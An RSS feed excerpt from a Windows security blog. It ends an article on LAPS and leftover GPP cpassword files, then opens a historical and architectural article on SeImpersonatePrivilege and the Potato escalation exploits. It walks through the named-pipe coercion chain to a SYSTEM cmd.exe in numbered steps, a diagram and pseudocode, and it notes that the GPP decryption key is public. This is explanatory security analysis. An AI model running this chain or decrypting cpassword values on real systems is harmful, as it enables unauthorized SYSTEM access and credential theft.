&lt;p&gt;Microsoft Entra &lt;em&gt;hybrid joined&lt;/em&gt; devices are workstations joined to both an on-premises AD domain and Microsoft Entra ID. The LAPS conversation about hybrid joined is a &lt;code&gt;BackupDirectory&lt;/code&gt; choice. Microsoft Entra &lt;em&gt;hybrid runbook workers&lt;/em&gt;, on the other hand, are an Azure Automation primitive -- worker processes that execute Automation runbooks against on-premises resources. They share a word and nothing else. A LAPS policy targeted at &quot;hybrid devices&quot; means hybrid joined; it has nothing to do with hybrid runbook workers. The article&apos;s section 8 includes the same disambiguation because operators conflate them with surprising frequency.&lt;/p&gt;
&lt;h3&gt;Sidebar C: How GPP cpassword still gets found in 2026&lt;/h3&gt;
&lt;p&gt;MS14-025 disabled new authoring but did not delete the artefacts [@ms14-025-bulletin]. The artefacts persist because SYSVOL replication is conservative -- nothing in the forest&apos;s design &lt;em&gt;deletes&lt;/em&gt; anything from SYSVOL just because the editor UI was hot-patched on the administrative workstation. A fresh PingCastle scan against a long-lived forest will routinely surface 2010-era &lt;code&gt;Groups.xml&lt;/code&gt; files [@pingcastle-rules], and the third-party scanner cohort is the only practical defence. The one-shot remediation pattern is: find with &lt;code&gt;A-PwdGPO&lt;/code&gt;, rotate the underlying password via the replacement tool (Windows LAPS for built-in local admin; a PAM vault for service accounts that were stored in GPP), then delete the &lt;code&gt;Groups.xml&lt;/code&gt; and let SYSVOL replication propagate the deletion.&lt;/p&gt;

No. Administrator Protection addresses in-session UAC-class elevation by brokering each elevation through a per-elevation transient shadow-admin identity [@tc-admin-protection-win11]; it does not provide a recoverable break-glass password for an off-network or non-bootable endpoint. The two systems are orthogonal and Microsoft recommends running them together on Windows 11 25H2 fleets. Replacing LAPS with Administrator Protection produces designs that lose the recovery primitive for laptops that have wandered off the corporate network for a year.

Defence in depth, plus a coverage-leak primitive. An LDAP reader who is not in `ADPasswordEncryptionPrincipal` gets only an opaque ciphertext blob [@ms-laps-concepts-overview] -- but the same reader can still enumerate which computer objects have a current `msLAPS-EncryptedPassword`, which gives them target-selection telemetry on managed-versus-unmanaged hosts. The canonical write-up of this class is Sean Metcalf&apos;s August 2016 ADSecurity piece on the legacy `ms-Mcs-AdmPwdExpirationTime` attribute [@adsec-laps-2016], and the architectural lesson carries forward to Windows LAPS unchanged.

Yes, in seconds. The 32-byte AES-256-CBC key is published verbatim in `[MS-GPPREF]` section 2.2.1.1.4 of Microsoft&apos;s Open Specifications corpus [@ms-gppref-aes-key] and that publication is permanent under the Open Specifications Promise. Any residual `Groups.xml` (or five sibling carriers including the asymmetric `Printers.xml` [@rewtdance-gpp-2012]) in SYSVOL that contains a `cpassword` attribute is operationally plaintext. The 2026 answer is to find them with PingCastle&apos;s `A-PwdGPO` rule [@pingcastle-rules] and remediate -- not to expect the artefacts to expire on their own.

No. The rotation cycle is the `PasswordAgeDays` interval (default 30 days, minimum 1 on AD backup, minimum 7 on Entra backup) [@ms-laps-policy-settings]. After authentication, `PostAuthenticationActions` (default `3` = reset + sign out) fires once the `PostAuthenticationResetDelay` window (default 24 hours) has elapsed. Value `11` (Windows 11 24H2 / Server 2025+) adds termination of remaining processes; it is *not* a forced shutdown without warning -- the standard two-minute warning still applies and SMB sessions are deleted.

Yes. LAPS rotates the password on a disabled account; the account simply cannot be used to log on until it is enabled. The break-glass runbook is: enable the account, retrieve the LAPS password, perform the recovery, rotate immediately, re-disable. On Windows 11 24H2 and Windows Server 2025 and later, Microsoft&apos;s recommendation is to enable Automatic Account Management with a randomised name and `AutomaticAccountManagementEnableAccount = 0` so the managed account ships disabled-by-default with a non-predictable name [@ms-laps-account-modes]. The pattern defeats predictable-RID-500 enumeration entirely.

Microsoft Entra ID. With `BackupDirectory = 1` [@ms-laps-policy-settings], the local LAPS component posts the rotated password to the `deviceLocalCredentials` resource on the Entra device object via Microsoft Graph [@ms-graph-localcredinfo]. Retrieval is via `Get-LapsAADPassword` (a wrapper around the Graph endpoint), the Microsoft Entra portal Devices blade, or a direct `GET /directory/deviceLocalCredentials/{deviceId}` call [@ms-laps-entra-scenarios]. Read permission requires the Cloud Device Administrator or Intune Service Administrator Entra role.

No. `CanReadGMSAPassword` is the edge for **Group Managed Service Accounts** -- a different Active Directory feature with a different ACL on a different attribute (`msDS-GroupMSAMembership`). The correct LAPS edge is **`ReadLAPSPassword`**, introduced in BloodHound 2.0 on August 7, 2018 [@specterops-bh2], and the current edge documentation covers both the legacy `ms-Mcs-AdmPwd` and the modern `msLAPS-*` attribute paths [@bloodhound-edge-readlaps].
&lt;p&gt;The companion posts in this series cover Pass-the-Hash itself (#76), DPAPI internals (#20), Microsoft Entra Privileged Identity Management (#90), Active Directory tiering (#72), Microsoft Defender for Identity (#87), and BloodHound (#77). Each of those is referenced in this article at the point where the topic would otherwise demand a digression; each has its own deep treatment elsewhere.&lt;/p&gt;
&lt;p&gt;Twenty years. Eleven years of which separated Microsoft&apos;s December 2012 articulation of the architecture from the April 11, 2023 in-box default [@ms-pth-whitepaper; @tc-windows-laps-ga-2023]. Four residual attack surfaces -- delegated-decryptor compromise, the pre-rotation OPSEC tail, BYOD endpoints, and the multi-decade MS14-025 cleanup tail [@ms14-025-bulletin] -- still resist the architecture rather than fall to it. One through-line: this is what shipping the right default a decade late looks like. The right defaults are now in the box. The directory is still tier 0. Somebody still has to break the glass. The architectural game from here is not to invent a new generation; it is to make sure the one we finally have is actually deployed, audited, and clean.&lt;/p&gt;
</content:encoded><category>windows</category><category>active-directory</category><category>laps</category><category>group-policy</category><category>identity</category><category>credential-theft</category><category>entra-id</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>A Mitigation That Became a Primitive: The Story of SeImpersonatePrivilege</title><link>https://paragmali.com/blog/a-mitigation-that-became-a-primitive-the-story-of-seimperson/</link><guid isPermaLink="true">https://paragmali.com/blog/a-mitigation-that-became-a-primitive-the-story-of-seimperson/</guid><description>How a 2003 backward-compatibility privilege became the most-abused Windows service primitive, and why every Microsoft closure path breaks something shipped.</description><pubDate>Tue, 02 Jun 2026 00:00:00 GMT</pubDate><content:encoded>
Any Windows process running as `IIS APPPOOL\...`, `MSSQLSERVER`, or any other LOCAL SERVICE or NETWORK SERVICE-derived account holds one privilege -- `SeImpersonatePrivilege` -- that is sufficient, given any token-source primitive, to become `NT AUTHORITY\SYSTEM`. The privilege was introduced in Windows Server 2003 as a *mitigation*, so that lower-privileged service accounts could keep impersonating their RPC clients after Microsoft moved services off `SYSTEM`. Eighteen years of named-exploit lineage -- Token Kidnapping (2008), HotPotato (2016), RottenPotato, JuicyPotato, PrintSpoofer, GodPotato, LocalPotato, SilverPotato -- all ride on the same three-piece system: the privilege, the `ImpersonateNamedPipeClient` API, and Microsoft&apos;s documented decision to treat Windows Service Hardening as a *safety* boundary rather than a *security* boundary. This article explains why every closure path Microsoft has shipped narrows the surface without closing it, and why the primitive is structurally undefeated in 2026.
&lt;h2&gt;1. The One Line in &lt;code&gt;whoami /priv&lt;/code&gt;&lt;/h2&gt;
&lt;p&gt;Open a shell inside any IIS application pool worker, any SQL Server service-step process, or any Exchange worker on a fully patched Windows 11 24H2 or Server 2025 box in 2026, and type &lt;code&gt;whoami /priv&lt;/code&gt;. One line will read:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SeImpersonatePrivilege  Impersonate a client after authentication  Enabled
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;That single line is sufficient, given the right coercion primitive, to become &lt;code&gt;NT AUTHORITY\SYSTEM&lt;/code&gt; in under a second. Microsoft has known this on the record since April 2009 [@msrc-blog-2009-04-token-kidnapping]. The privilege has not moved.&lt;/p&gt;

A Windows user right that lets a process call any of the kernel&apos;s token-substitution APIs on a token it has received from another principal. The right is enumerated as the constant `SE_IMPERSONATE_NAME` [@ms-learn-privilege-constants]. It is assigned by default to `LOCAL SERVICE`, `NETWORK SERVICE`, the local Administrators group, and every Windows service that runs under one of those accounts [@ms-learn-impersonate-policy].

Two well-known Windows accounts introduced in Windows Server 2003 / XP SP2 as a hardening alternative to running services under `NT AUTHORITY\SYSTEM`. The Microsoft Learn account documentation lists each account&apos;s default privilege set; in both cases `SE_IMPERSONATE_NAME` appears with the marker `(enabled)` [@ms-learn-localservice; @ms-learn-networkservice].
&lt;p&gt;The Microsoft Learn pages list this assignment as a default. &quot;Enabled&quot; is a token-state distinction with operational weight. Most privileges in a service-account token are &lt;em&gt;present but disabled&lt;/em&gt;: the process can call &lt;code&gt;AdjustTokenPrivileges&lt;/code&gt; to turn them on, but until that happens the kernel treats the privilege as absent during access checks. &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; on a NETWORK SERVICE token is shipped &lt;em&gt;enabled&lt;/em&gt;. The process can call &lt;code&gt;CreateProcessWithTokenW&lt;/code&gt; immediately, on first instruction.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; There is a real semantic difference between a privilege that is present-but-disabled and a privilege that is enabled. The kernel checks the &lt;em&gt;enabled&lt;/em&gt; bit during access decisions. A NETWORK SERVICE process does not need to elevate the privilege before using it; the token already has it in the active state. This is the reason a freshly spawned IIS worker is one well-aimed coercion away from SYSTEM, with no preparatory steps.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Andrea Pierini, one of the most prolific researchers on this primitive, put the operational fact in eleven words: &quot;if you have SeAssignPrimaryToken or SeImpersonate privilege, you are SYSTEM&quot; [@labro-2020-printspoofer-post]. Clement Labro, quoting him, added the qualifier: &quot;a deliberately provocative shortcut obviously, but it&apos;s not far from the truth.&quot; The aphorism gets repeated in every PrintSpoofer-era writeup for a reason.&lt;/p&gt;
&lt;p&gt;Here is the article&apos;s load-bearing claim, stated up front and re-argued through every section that follows:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Microsoft gave every NETWORK SERVICE a privilege that, in the wrong hands, is equivalent to SYSTEM. They knew. They could not change it without breaking the service model. Roughly eighteen years after Cerrudo first put that fact on the record -- and ten years after HotPotato made it pushbutton -- they still have not.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The figure &quot;roughly eighteen years&quot; anchors to Cesar Cerrudo&apos;s March 2008 disclosure at Hack In The Box Dubai [@cerrudo-2008-pdf]. The privilege itself shipped earlier, in Server 2003 / XP SP2 (2003-2004), and the operational-pushbutton anchor is Stephen Breen&apos;s HotPotato (January 16, 2016) [@breen-2016-hot-potato]. Three different dates, three different anchors for &quot;how long has this been true.&quot; The article uses the Cerrudo date because that is when the fact entered the offensive-research public record.&lt;/p&gt;
&lt;p&gt;From here, this article traces the privilege from a 2003 backward-compatibility concession to a 2024 Troopers articulation by Pierini and Cocomazzi, and explains why every closure path Microsoft has shipped narrows the surface without closing it.&lt;/p&gt;
&lt;p&gt;{`
// On a Windows service account, this is the line that matters:
const tokenPrivileges = [
  { name: &apos;SeAssignPrimaryTokenPrivilege&apos;, state: &apos;Disabled&apos; },
  { name: &apos;SeIncreaseQuotaPrivilege&apos;,      state: &apos;Disabled&apos; },
  { name: &apos;SeAuditPrivilege&apos;,              state: &apos;Disabled&apos; },
  { name: &apos;SeChangeNotifyPrivilege&apos;,       state: &apos;Enabled&apos;  },
  { name: &apos;SeImpersonatePrivilege&apos;,        state: &apos;Enabled&apos;  },  // &amp;lt;-- the gate
  { name: &apos;SeCreateGlobalPrivilege&apos;,       state: &apos;Enabled&apos;  },
];&lt;/p&gt;
&lt;p&gt;const gateOpen = tokenPrivileges.some(
  p =&amp;gt; p.name === &apos;SeImpersonatePrivilege&apos; &amp;amp;&amp;amp; p.state === &apos;Enabled&apos;
);
console.log(gateOpen ? &apos;Gate is open. Token-source primitive is the only missing piece.&apos; : &apos;Gate is closed.&apos;);
`}&lt;/p&gt;
&lt;p&gt;If one line in &lt;code&gt;whoami /priv&lt;/code&gt; is sufficient to become SYSTEM, why does Microsoft ship that line as the default for every IIS application pool, every SQL Server service step, and every Exchange worker process on every shipping Windows release? The answer is not a mistake. It is a decision -- and to understand it we need to go back to a Tymshare FORTRAN compiler in the late 1970s, around 1977 by Hardy&apos;s own &quot;about eleven years ago&quot; dating from his 1988 paper.&lt;/p&gt;
&lt;h2&gt;2. Hardy&apos;s Deputy and the 2003 Service-Hardening Pivot&lt;/h2&gt;
&lt;p&gt;In the late 1970s, around 1977, a Tymshare engineer named Norm Hardy watched a FORTRAN compiler with &quot;home files license&quot; overwrite the system billing file &lt;code&gt;(SYSX)BILL&lt;/code&gt; because some user had passed that path as the compiler&apos;s debug-output target. The compiler had two authorities -- its own (to read system libraries) and the caller&apos;s (to write the caller&apos;s files) -- and no way to keep them separate when serving a request. The compiler was, in Hardy&apos;s later phrasing, &lt;em&gt;confused&lt;/em&gt; about which authority to use [@hardy-1988].&lt;/p&gt;

A program that holds authority on behalf of two or more principals at once and has no architectural way to keep those authorities separate when acting on a request. Hardy&apos;s 1988 paper [@hardy-1988] argues that any identity-and-ACL system in which a server holds more authority than its clients and acts on client requests has a confused-deputy attack surface by construction. The only complete defence, Hardy argues, is capability-based access control.
&lt;p&gt;Hardy&apos;s argument generalises: as long as authority flows ambiently with identity rather than being passed explicitly with each request, a server cannot reliably tell whose authority a given request should run under. This is not a bug class. It is a structural property of the access-matrix model Lampson formalised in 1971 [@lampson-1971]. Windows is an instance of that model. A NETWORK SERVICE process holding &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; is &lt;em&gt;Hardy&apos;s deputy&lt;/em&gt;: it carries two authorities at once (its own modest service identity and whatever caller just connected to its named pipe), and Windows has no in-architecture way to keep them apart.&lt;/p&gt;

Capability systems -- EROS, Coyotos, seL4 -- bind authority to operations rather than to running identities. A capability is an unforgeable token that names both an object and the rights you have on it; you cannot exercise authority you were not handed. In a capability system, Hardy&apos;s compiler would have been handed a capability only for the file the caller actually wanted opened, and the bill-overwrite would have been mechanically prevented. Windows shipped the alternative design in 1993 -- identity-and-ACL with kernel tokens carrying ambient authority -- and the rest of this article is, in a precise sense, the story of what that design costs eighteen years on. Section 8 returns to this thread.
&lt;h3&gt;2.1 The kernel object Cutler&apos;s team shipped in 1993&lt;/h3&gt;
&lt;p&gt;Dave Cutler&apos;s NT 3.1 team chose the identity-and-ACL model and built a kernel object to carry it. The &lt;em&gt;access token&lt;/em&gt; is what an NT thread or process holds; it enumerates the user SID, the group SIDs, and the privileges currently associated with the running code. Every access check the kernel performs reduces to &quot;does this token, evaluated against this object&apos;s ACL, grant the requested rights?&quot; The standard reference is &lt;em&gt;Windows Internals&lt;/em&gt;, Part 1, chapter on security [@ms-learn-windows-internals].&lt;/p&gt;

A kernel object the Windows security subsystem creates at logon (and clones on demand). It carries the user SID, group SIDs, privileges, integrity level, and impersonation level for a running thread or process. Tokens come in two flavours: *primary* (attached to a process at creation) and *impersonation* (attached to a thread to make it temporarily act as another identity).
&lt;p&gt;NT 3.1 also shipped two structural distinctions that the rest of this article depends on. First, &lt;em&gt;primary&lt;/em&gt; versus &lt;em&gt;impersonation&lt;/em&gt; tokens -- a primary token is what a process is born with; an impersonation token is what a thread can wear temporarily to act on behalf of someone else. Second, the four &lt;em&gt;impersonation levels&lt;/em&gt; (Anonymous, Identification, Impersonation, Delegation), each granting progressively more authority to act under the borrowed identity. Both distinctions exist because servers need to act on client requests under the client&apos;s authority -- and both distinctions are the surface every Potato variant operates on.&lt;/p&gt;
&lt;p&gt;The Tymshare anecdote that Hardy uses in the 1988 paper -- the FORTRAN compiler that overwrote &lt;code&gt;(SYSX)BILL&lt;/code&gt; -- is worth recounting in full because it is structurally identical to the Windows scenario. A user invoked the compiler with the billing information file as the debug-output target. The compiler had write access to system files (it was a &quot;home files license&quot; service). The compiler dutifully opened the user-supplied path under its own authority and wrote debug output to it, destroying the bill. The compiler was not malicious; it had no way to ask the OS to scope its write to &quot;only files the caller could write.&quot; Hardy&apos;s own dating in the paper is &quot;about eleven years ago&quot; from 1988 -- so the events sit in the late 1970s, not the early ones.&lt;/p&gt;
&lt;h3&gt;2.2 Why the privilege exists: the 2003 service-hardening pivot&lt;/h3&gt;
&lt;p&gt;Through the 1990s, Windows services almost universally ran under &lt;code&gt;NT AUTHORITY\SYSTEM&lt;/code&gt;. The convenience was operational: SYSTEM is the local-machine principal and holds every right the kernel knows about, so a service running as SYSTEM never needed an explicit privilege grant. The cost became visible in 2001-2003 as the first generation of service-borne worms hit production: Code Red and Nimda (2001) walked IIS; SQL Slammer and MSBlast (2003) walked SQL Server and the DCOM RPC endpoint [@wikipedia-timeline-worms]. Every successful remote code execution against a service became a SYSTEM compromise of the host, because the service &lt;em&gt;was&lt;/em&gt; SYSTEM.&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s response was a structural retreat. Two new well-known accounts shipped in Windows Server 2003 (and reached desktop with XP SP2 in 2004): &lt;code&gt;NT AUTHORITY\LOCAL SERVICE&lt;/code&gt; (no network credentials) and &lt;code&gt;NT AUTHORITY\NETWORK SERVICE&lt;/code&gt; (machine-account credentials when authenticating off-box). The two account documentation pages enumerate the default privileges the SCM assigns when a service is configured to run under either account [@ms-learn-localservice; @ms-learn-networkservice]. Most of the SYSTEM-only privileges -- &lt;code&gt;SeTcbPrivilege&lt;/code&gt;, &lt;code&gt;SeLoadDriverPrivilege&lt;/code&gt;, &lt;code&gt;SeRestorePrivilege&lt;/code&gt; -- are absent from the enumerated default sets [@ms-learn-localservice; @ms-learn-networkservice]. The intent was clear: a worm-popped IIS worker should land as a low-privileged process, not as SYSTEM.&lt;/p&gt;
&lt;p&gt;But the new accounts could not lose &lt;em&gt;every&lt;/em&gt; SYSTEM authority. Pre-2003 services routinely impersonated their clients to make access checks against per-user resources -- IIS reading a user&apos;s home directory under the user&apos;s identity, SQL Server enforcing per-login row security, the SMB server returning per-user file lists. That entire pattern depended on the service being able to call &lt;code&gt;ImpersonateNamedPipeClient&lt;/code&gt; (or &lt;code&gt;RpcImpersonateClient&lt;/code&gt;, or one of the LSA-side APIs) and then act under the caller&apos;s token. If LOCAL SERVICE and NETWORK SERVICE could not impersonate, the entire RPC server population would break.&lt;/p&gt;
&lt;p&gt;So Microsoft introduced &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; -- a new named user right gating the impersonation APIs -- and assigned it by default to the local Administrators group, LOCAL SERVICE, NETWORK SERVICE, and the SERVICE well-known group; because the SCM adds the SERVICE group SID to every service token, SCM-started services inherit the right through that assignment [@ms-learn-impersonate-policy]. The policy-setting page is explicit about the intent: &quot;If this user right is required for this type of impersonation, an unauthorized user cannot cause a client to connect (for example, by remote procedure call (RPC) or named pipes) to a service that they have created to impersonate that client&quot; [@ms-learn-impersonate-policy].&lt;/p&gt;
&lt;p&gt;The privilege, in other words, was created &lt;em&gt;as a mitigation&lt;/em&gt;. Its purpose was to keep impersonation working for legitimate service-account RPC servers while denying it to ordinary user processes. That decision -- to gate impersonation on an explicit named right rather than to forbid impersonation outright -- is the architectural pivot the rest of this article re-examines from every angle.&lt;/p&gt;

flowchart TD
    Client[&quot;Low-privileged caller&quot;] -- &quot;Connects to attacker pipe&quot; --&amp;gt; NS[&quot;NETWORK SERVICE process&quot;]
    NS -- &quot;Holds its own modest authority&quot; --&amp;gt; A1[&quot;Authority 1, service identity&quot;]
    NS -- &quot;Holds SeImpersonatePrivilege&quot; --&amp;gt; A2[&quot;Authority 2, any token it receives&quot;]
    SYSPROC[&quot;Privileged caller, SYSTEM&quot;] -- &quot;Coerced to authenticate to the pipe&quot; --&amp;gt; NS
    NS -- &quot;Impersonate caller token, then act&quot; --&amp;gt; Action[&quot;Action runs under SYSTEM&quot;]
&lt;p&gt;Microsoft did not introduce &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; to enable an exploit. They introduced it as a backward-compatibility concession. So why did the privilege become the dominant lineage of service-to-SYSTEM elevation for nearly two decades? The answer starts with the API surface.&lt;/p&gt;
&lt;h2&gt;3. The Token API Surface&lt;/h2&gt;
&lt;p&gt;There is no single &quot;impersonate&quot; API on Windows. There are four substitution APIs that put a token on a thread or a new process, and one coercion API that supplies the token in the first place. The Potato family lives at the intersection of all five.&lt;/p&gt;
&lt;h3&gt;3.1 Primary versus impersonation tokens&lt;/h3&gt;
&lt;p&gt;The kernel distinguishes &lt;code&gt;TOKEN_PRIMARY&lt;/code&gt; from &lt;code&gt;TOKEN_IMPERSONATION&lt;/code&gt;. A primary token is what a process is created with; an impersonation token can be attached only to a thread. The distinction matters operationally because only an impersonation token at level &lt;code&gt;SecurityImpersonation&lt;/code&gt; or &lt;code&gt;SecurityDelegation&lt;/code&gt; lets you take real action under the borrowed identity. An &lt;code&gt;Identification&lt;/code&gt;-level token can be checked against ACLs but cannot be used to open kernel objects under the new identity, and an &lt;code&gt;Anonymous&lt;/code&gt;-level token is useless for almost everything [@ms-learn-windows-internals; @ms-learn-impersonateloggedonuser].&lt;/p&gt;

A *primary token* is created at logon and attached to a process for its lifetime; the kernel uses it for every access check the process makes by default. An *impersonation token* is attached to an individual thread by `SetThreadToken` (or by an impersonation API that calls it internally) and overrides the primary token for that thread only. The kernel reserves the right to demote impersonation tokens to `Identification` level in cross-machine RPC scenarios where delegation has not been explicitly negotiated.

A four-value enum -- `SecurityAnonymous`, `SecurityIdentification`, `SecurityImpersonation`, `SecurityDelegation` -- carried on every impersonation token. It limits what the impersonating thread can do under the borrowed identity. `SecurityImpersonation` is the level a service can act under for local access checks; `SecurityDelegation` extends that to off-box authentication and is the level the LocalPotato class occasionally reaches.
&lt;p&gt;The Potato lineage navigates these four levels with care. &lt;code&gt;Identification&lt;/code&gt; is harmless because it cannot spawn a process under the borrowed identity; &lt;code&gt;Impersonation&lt;/code&gt; is the level a service can act under for any local kernel object; &lt;code&gt;Delegation&lt;/code&gt; is what cross-host variants such as SilverPotato sometimes need.&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;SecurityIdentification&lt;/code&gt; versus &lt;code&gt;SecurityImpersonation&lt;/code&gt; distinction is the gate that makes many naive coercion attempts fail. If the attacker controls only an RPC interface that performs an &lt;code&gt;ImpersonateClient&lt;/code&gt; call without the right SQOS (Security Quality of Service) negotiation, the resulting token may land at &lt;code&gt;SecurityIdentification&lt;/code&gt; -- usable for &lt;code&gt;AccessCheck&lt;/code&gt;, useless for &lt;code&gt;CreateProcessWithTokenW&lt;/code&gt;. Each Potato variant either chooses a coercion primitive that arrives at &lt;code&gt;SecurityImpersonation&lt;/code&gt; or upgrades the token via a subsequent &lt;code&gt;DuplicateTokenEx&lt;/code&gt;.&lt;/p&gt;
&lt;h3&gt;3.2 The substitution primitives&lt;/h3&gt;
&lt;p&gt;Four APIs move tokens around the system. None of them produces a token from nothing; all of them assume the caller already has a handle to one.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;SetThreadToken&lt;/code&gt; -- attach an impersonation token to a thread [@ms-learn-setthreadtoken]. The thread now runs under the borrowed identity for every subsequent access check.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;ImpersonateLoggedOnUser&lt;/code&gt; -- the thread-level convenience wrapper [@ms-learn-impersonateloggedonuser]. Same effect as &lt;code&gt;SetThreadToken&lt;/code&gt;, with simpler arguments.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;DuplicateTokenEx&lt;/code&gt; -- create a new token from an existing one, with adjustable type (primary vs impersonation) and level (the four-value enum above) [@ms-learn-duplicatetokenex]. The Potato lineage uses this to convert an impersonation token into a primary one before launching a process.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;CreateProcessWithTokenW&lt;/code&gt; -- spawn a new process under an arbitrary primary token [@ms-learn-createprocesswithtokenw]. The Microsoft Learn documentation is explicit about the gate: &quot;The process that calls &lt;strong&gt;CreateProcessWithTokenW&lt;/strong&gt; must have the &lt;code&gt;SE_IMPERSONATE_NAME&lt;/code&gt; privilege.&quot;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;That last sentence is the keystone. &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; is not just &quot;the right to impersonate.&quot; It is the right to convert an impersonated identity into a fresh process that owns the desktop, the registry, the file system, and every other kernel object the borrowed identity has authority over. Without the privilege, the attacker has a thread temporarily wearing SYSTEM&apos;s hat; with it, the attacker has &lt;code&gt;cmd.exe&lt;/code&gt; running as SYSTEM until the system reboots.&lt;/p&gt;
&lt;h3&gt;3.3 The coercion primitive&lt;/h3&gt;
&lt;p&gt;The three substitution primitives are inert without a token to substitute. The dominant token source on Windows is the named-pipe server primitive &lt;code&gt;ImpersonateNamedPipeClient&lt;/code&gt;, shipped since Windows XP / Server 2003 [@ms-learn-impersonatenamedpipeclient]. Any process that owns a named pipe can call this API after a client connects; the impersonating thread then wears the caller&apos;s token at whatever impersonation level the caller&apos;s SQOS negotiated.&lt;/p&gt;

A Win32 API that copies the connected client&apos;s access token onto the calling thread, after which the thread acts under the client&apos;s identity until `RevertToSelf` is called. The API has shipped since Windows XP / Server 2003 [@ms-learn-impersonatenamedpipeclient]. It is the load-bearing token source for every Potato variant from HotPotato through GodPotato. Calling the API at higher than `SecurityIdentification` requires `SeImpersonatePrivilege` on the caller.
&lt;p&gt;This is the four-step chain every Potato operator runs, as enumerated in Forshaw&apos;s 2021 Project Zero retrospective on the lineage [@forshaw-2021-10-relaying-dcom-pz]:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;code&gt;CreateNamedPipe(&quot;\\.\pipe\&amp;lt;attacker_name&amp;gt;&quot;)&lt;/code&gt; -- a service-account process opens a pipe it controls.&lt;/li&gt;
&lt;li&gt;Induce some privileged Windows component to authenticate to that pipe.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;ImpersonateNamedPipeClient&lt;/code&gt; -- the impersonating thread now wears the caller&apos;s token.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;DuplicateTokenEx&lt;/code&gt; to primary; &lt;code&gt;CreateProcessWithTokenW(cmd.exe)&lt;/code&gt;.&lt;/li&gt;
&lt;/ol&gt;

sequenceDiagram
    participant Atk as Attacker, service account
    participant Pipe as Named pipe attacker controls
    participant Sys as Privileged caller, SYSTEM-context
    Atk-&amp;gt;&amp;gt;Pipe: CreateNamedPipe and listen
    Atk-&amp;gt;&amp;gt;Sys: Trigger coercion primitive
    Sys-&amp;gt;&amp;gt;Pipe: Authenticate to the pipe
    Atk-&amp;gt;&amp;gt;Pipe: ImpersonateNamedPipeClient
    Atk-&amp;gt;&amp;gt;Atk: DuplicateTokenEx, impersonation to primary
    Atk-&amp;gt;&amp;gt;Atk: CreateProcessWithTokenW cmd.exe
    Note over Atk: cmd.exe now running as SYSTEM
&lt;p&gt;Step three depends on step two. Impersonating the client depends on first receiving the privileged authentication, and that authentication, the question of where the token comes from, is the one every generation of Potato has answered differently -- and that Microsoft has patched, one token source at a time, for nearly two decades.&lt;/p&gt;
&lt;p&gt;{`
// Pseudocode showing the four-step Potato chain.
// Privilege checks shown as comments where the kernel enforces them.&lt;/p&gt;
&lt;p&gt;function impersonationChain(coercionTrigger) {
  const pipe = createNamedPipe(&quot;\\.\pipe\demo&quot;);            // no privilege required
  coercionTrigger(pipe);                                          // induce SYSTEM to connect
  pipe.waitForConnect();&lt;/p&gt;
&lt;p&gt;  // kernel allows SecurityImpersonation only if caller has SeImpersonatePrivilege:
  const callerToken = pipe.impersonateNamedPipeClient();&lt;/p&gt;
&lt;p&gt;  const primary = duplicateTokenEx(callerToken, &quot;primary&quot;,
                                   &quot;SecurityImpersonation&quot;);      // no privilege required&lt;/p&gt;
&lt;p&gt;  // kernel gate: requires SE_IMPERSONATE_NAME on the calling process:
  return createProcessWithTokenW(primary, &quot;cmd.exe&quot;);
}
`}&lt;/p&gt;
&lt;h3&gt;3.4 The privilege next to it&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;CreateProcessWithTokenW&lt;/code&gt; is gated on &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt;. Its sibling &lt;code&gt;CreateProcessAsUser&lt;/code&gt; is gated on a &lt;em&gt;different&lt;/em&gt; pair of privileges -- &lt;code&gt;SeAssignPrimaryTokenPrivilege&lt;/code&gt; (constant name &lt;code&gt;SE_ASSIGNPRIMARYTOKEN_NAME&lt;/code&gt;) when the supplied token is not assignable by the caller, plus &lt;code&gt;SeIncreaseQuotaPrivilege&lt;/code&gt; (&lt;code&gt;SE_INCREASE_QUOTA_NAME&lt;/code&gt;) in all cases. Both are enumerated separately in the privilege-constants table [@ms-learn-privilege-constants]. On a NETWORK SERVICE or LOCAL SERVICE token, &lt;code&gt;SE_ASSIGNPRIMARYTOKEN_NAME&lt;/code&gt; and &lt;code&gt;SE_INCREASE_QUOTA_NAME&lt;/code&gt; are both &lt;em&gt;present but disabled&lt;/em&gt; [@ms-learn-localservice; @ms-learn-networkservice]: a service-account process must call &lt;code&gt;AdjustTokenPrivileges&lt;/code&gt; to enable them before &lt;code&gt;CreateProcessAsUser&lt;/code&gt; will succeed, whereas &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; is shipped &lt;em&gt;enabled&lt;/em&gt; and &lt;code&gt;CreateProcessWithTokenW&lt;/code&gt; works on the first instruction. Pierini&apos;s aphorism quoted in section 1 names both privileges because either one independently makes the same chain runnable -- but on a vanilla NETWORK SERVICE token, only &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; is enabled, and the rest of this article treats it as the privilege that matters in practice.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;API&lt;/th&gt;
&lt;th&gt;Privilege required&lt;/th&gt;
&lt;th&gt;Input&lt;/th&gt;
&lt;th&gt;Output&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;&lt;code&gt;ImpersonateNamedPipeClient&lt;/code&gt;&lt;/td&gt;
